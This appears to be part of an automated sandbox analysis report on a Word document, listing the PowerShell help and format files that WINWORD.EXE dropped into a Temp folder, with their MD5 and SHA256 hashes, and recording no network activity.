SHA256: fa023b369ab994a58076ff6b973d783124ce13c69deb614d5980c7f6d92633c1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Parsing.help.txt
text
MD5: 2209dcd8e1b1b3508404a93ae2b4dac2
SHA256: 5af6713ef8f416ef4bbd7c81fcb9caa1778ac4746ccab2eb1f7dcd254181cb08
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_methods.help.txt
text
MD5: 6b43c71a84500386d5f27defd6565fa2
SHA256: 4f4607cfe8019088da7343c65cdeccf20f3b143d88d75f0a1e0d3213cd134f8a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_parameters.help.txt
text
MD5: bd7ea6bc90d01a0602f613da704da5bd
SHA256: 40ad4ed4d5c20a9c034adf54b8459b6f713b95ee9b9446310f9e01843722d3c0
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Path_Syntax.help.txt
text
MD5: ad60d27a0f5b7b6a9138c82a93b0928f
SHA256: 2c04701294f26e634297d7c0da90b8f68118444796757eba42ef4e088784af01
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_modules.help.txt
text
MD5: d5e0ab3b288a05cd5fc599e54b9be2d7
SHA256: 4896a7da09afa4ba971245023a1553616def5fe598eeb5d2c0a3576259f280f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_jobs.help.txt
text
MD5: e820b3afc4b36f28adad78b40d6c5a2d
SHA256: 772d3fe1423995399601cc11f89b2e4d9609baaeb83120c3fb294566f16d079c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_join.help.txt
text
MD5: 81f6388a6beae9dc1255d05fd2c8646a
SHA256: 6c94e68a780ba445066c3453ab1bb6d71216e32d44282bd3c6228a121f5cf9f3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Language_Keywords.help.txt
text
MD5: 0ad599ac4f7c8906c0d229788e96254a
SHA256: ce445ae30da19371d775e9e43882793927a2872654fe4c270578a698348bae90
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_locations.help.txt
text
MD5: dacf3b0d8819b5f706b94db45c0ee402
SHA256: 34aaaa4de11397215cb2778462bd0a4d6b2e58f7b560b6f52aff405d2ee92ab2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_operators.help.txt
text
MD5: bba4d9d2698b576530f9337ccc056fc0
SHA256: abf5e9060b66b5a498cd735d8243a5111a2f37c82c326dd375c0bb5cd21627ef
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_History.help.txt
text
MD5: 5247459f303b12b74cf35c88ba7679f0
SHA256: 5075e80ec46ab03b51a041de1ef88bced94aff35791c4810cdded71661863ca3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_If.help.txt
text
MD5: 5ed2ac359cca7cc708694b6a676384a0
SHA256: 3ad7fd0279f054e1992415f47e6e16b147485ab82bad6038f05aff5f2c5605b9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Line_Editing.help.txt
text
MD5: 990713f37dcc0aa688f78f4fbdb2b86c
SHA256: 668d5e7e4ed0e9551e9415bbc623e20955affaecf263360d0f1c77f1e8c180f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_objects.help.txt
text
MD5: eb466f74dbd492ac5e4e642151b29e13
SHA256: ecc728797338a52970872f9795128f7d2e1142cd42f4e67a28e27267b4b098e8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_job_details.help.txt
text
MD5: 2300489f3d24d182e0134470cce76158
SHA256: cad0edabb7a3b710c9df4bb2be03db8beaacb6527c26d9787d6f72d0a30f26dd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_logical_operators.help.txt
text
MD5: 8f9bc2797b95d1456a705b69819a828b
SHA256: 36ccd7847b33fa23d84da4a7e3d98821dc119c91534f5d1e53f9db6005fba41a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Core_Commands.help.txt
text
MD5: 9ddd0d75db8b8d52e1bd4474ed24582f
SHA256: a7743fc735a6887cb51a51fb26e57fd0ed858cbae9844242b49a6c80d7afa45c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced_parameters.help.txt
text
MD5: dd3a21a98a0c62745e9a09f165d24676
SHA256: 7380ce7bb8e9b3e87ba91b25cca7d47aed75846bf62faae4efffdf6e816fdae6
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_data_sections.help.txt
text
MD5: 4749443816fde8b533b18b8e80a86f53
SHA256: cbb6bde551361f88226276c8135102ba712dd50225a90cf0bf57cee0dbf9a758
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_eventlogs.help.txt
text
MD5: 59c7512b5261ac5d0a02fcc3e6fd077c
SHA256: c5999028e774c6535b17ada9893d684278810dfd8da82d60e3b812d22be09256
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Foreach.help.txt
text
MD5: a012634c19a188800968ece8a2a74385
SHA256: ba65881c4b99034c7319c40e4145dd22872e8acc6b6f886eb95de4b252324caf
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_format.ps1xml.help.txt
text
MD5: ebf6b26a926e6e9cd418b507698e0af3
SHA256: 52a7f15822fefa602bd7b125de0ea03becaa4e5c8bdd0346f849c688667abca1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions.help.txt
text
MD5: 7b29ab9dcf5e59eb86f8c030b395af79
SHA256: 5bf2e0c2b3d8f44385dab3edddcf39527f3cadf162358919362fa41abe147865
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced.help.txt
text
MD5: 5b4ae14fe4ff47bf87e7b768dc46ce03
SHA256: 5306ebfdf7918c8bd9100a1e840662d33b0109f8e0ef852d23c3c17467e7f88d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_escape_characters.help.txt
text
MD5: ba3da2ae40d346973a66ff105ca7cef3
SHA256: 19bd5c33a0c354716df01a651195c552696b4b62ec745661789fc36644e5e15d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_cmdletbindingattribute.help.txt
text
MD5: 0aa24c2ac8720c212bd2f73b100ab4e8
SHA256: f6a22568067c8eface6e0597c43374af3506ba73173a6e3daf2ba495dbc950de
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced_methods.help.txt
text
MD5: 68ab90b7dab1a5f9b37c469c72e84096
SHA256: d6f7acf2d9741613094c09f956cbb2f82bd89318223095829faab40d4d476eec
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_environment_variables.help.txt
text
MD5: 592117f8ddd831da25bebe6e2fc58eb2
SHA256: 447081fbed7cc935ef69613592032f75da4d002c9948e16c4f9f628e4c880ee4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_do.help.txt
text
MD5: 490344bc575a1f2fe43aa0785b20cbe1
SHA256: 18eff25c341bd276707758467b5a2279b1f1fe43703786505803434586c8d134
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_hash_tables.help.txt
text
MD5: 8b6304c033642b3864f52c9772a95950
SHA256: 402b062fb414c3389b6fc02b7c052efed071ee90df609613d00c7d3cd37d86ba
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_For.help.txt
text
MD5: 18cc7f5e7435194b0dad8ee8dd3a1793
SHA256: 7366e7ca7cb79bb18c18a8f408840cfc0a84ce9ed915001376a0e6f716edfeb9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_debuggers.help.txt
text
MD5: dd41e5d943f66bc0ce48eeb0376a398e
SHA256: be9f4b6ba21efb0f13cb47a0f90fe8c23b36ae56c433ecb460f354144ab18b84
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_execution_policies.help.txt
text
MD5: f82cde32b45bea260dfcefb28c72ce9e
SHA256: a261adbb9aae03c76d0678dda45997ea0d97b24b04ba3f17f9f56963903aa7b2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txt
text
MD5: 847b0c3a6010660492ecc1d88a69210d
SHA256: 7d7ee4469ae76392317dc7e16e716b5767bd7eefcdc39f60c51ed1da2e99ae2b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xml
text
MD5: ff6eeb8125b9265c5ba40af9f7c6f6bc
SHA256: 7d569c1155cfa9b7bb2ba225ee409a55c8b0e8217f3a7e05baa39da1bd7c4689
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_command_precedence.help.txt
text
MD5: 9b204318b2747400638fe5028e376100
SHA256: a79d0811c03feb6129802426f53799cba1a93c4bd204ce33e55bc180d3f0f132
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_CommonParameters.help.txt
text
MD5: bd04b34656edf637080e5b39ac179450
SHA256: 5aa4d407219915fb2f87fac21e309e9933cc98b6394a3b3d4873f5c139c48da1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xml
xml
MD5: c93a361112351b30e2c959e72789952d
SHA256: 4379bd59c1328a6811584d424df3dc193a5d607e2859d3ac1655b9124a5f100d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Break.help.txt
text
MD5: aedbfc39660ae3e030761ed4782ce328
SHA256: 13231768182599ec2c15b281f5e313e36428327479da7f05ff8a92c5479214f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xml
xml
MD5: 1ab2fd4b6749ad6831c86411fdcafb48
SHA256: 98540086cfc986d7604ffded977ef20944d1715bf8453809ce736c919cb6e1ef
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Assignment_Operators.help.txt
text
MD5: d2dd0c7c3423cdc0040b68fbc475428e
SHA256: 4da2f663032a15d4ecb7a6fcb6df8d5c07d097ed8d3fa9ec054d676584c4b411
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txt
text
MD5: 409ed6be5314bac97afc88aca11725a8
SHA256: 613eba45d12113b49d942ff9cfc939f0f5c8cabb819b5b3bd47b7a4f9e719d48
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Arithmetic_Operators.help.txt
text
MD5: 04d0cdc53b434b3fe0022831c9d06a84
SHA256: d42c3639dc7e4816800b1221e74f682bc3e6c8f34d00cc4765b3adebc173bbba
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PowerShellTrace.format.ps1xml
xml
MD5: 134a65f6be32e46342b5e514937b0b49
SHA256: e0cca802af6b0081a1615a1249461bc56227a1f86e98311999a1c96e1b47c5e9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Automatic_Variables.help.txt
text
MD5: 96a664e1a1ee05b3a0c24d3187f9a1a9
SHA256: f6f0ce7433667264eb7483b8c5ef62bec39cc4f3e7d24378471af28cd458fed7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Continue.help.txt
text
MD5: 2775518b0c0896a3b88c7ea577acffc3
SHA256: dae6b448ee1a5696ad66f43a053dba37f6c20f0fe1008ce35f4fdf440b0f4100
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_arrays.help.txt
text
MD5: 04bb4aa2cf5a5d3ead1d9f6eea89c034
SHA256: 0c058df25203e39d339f127c0ae8235ee3e2e77f33b57f894e8e5a4ae6243ec8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comment_Based_Help.help.txt
text
MD5: 8d7e5ad25683e71cd1dfe4949a754bc5
SHA256: a653702f520d12525099f8c7ff70a92d812c3dd3965d2d4953c2fa6840916ecd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_aliases.help.txt
text
MD5: dccde3d3fa7a378dab091d3b78e393cb
SHA256: 5dd570caa907247bac82b722b453619adc88063c238b294154939481c134b140
2372
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNK
lnk
MD5: 1646f6f20d0cfc75416a644f97532017
SHA256: b32ebc7d5cf76df0c0a167bee162b7523fc4cf2fddf30744486c5869f2072e60
2372
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: c602dfe9823e722f2f602f33a37cbb13
SHA256: b9f85015219ca33c2616875f9802dcede0301fbd50f4336f285fcb9712451de2
2372
WINWORD.EXE
C:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc
pgc
MD5: adeb6243cb5fad24cf9d150ec6aa3e0d
SHA256: 0b567364b7ea4a3e8846d6d723ece32dd8d14c1cf9893af84900686d538ff0fb
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\PSDiagnostics\PSDiagnostics.psd1
text
MD5: 6c7ab4f2165404cfc34a925289f03c9a
SHA256: c5a5a93cb0e2ca88d267ecd74ae10798d7a8058cf517732687e31b9b4939d612

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

No debug info.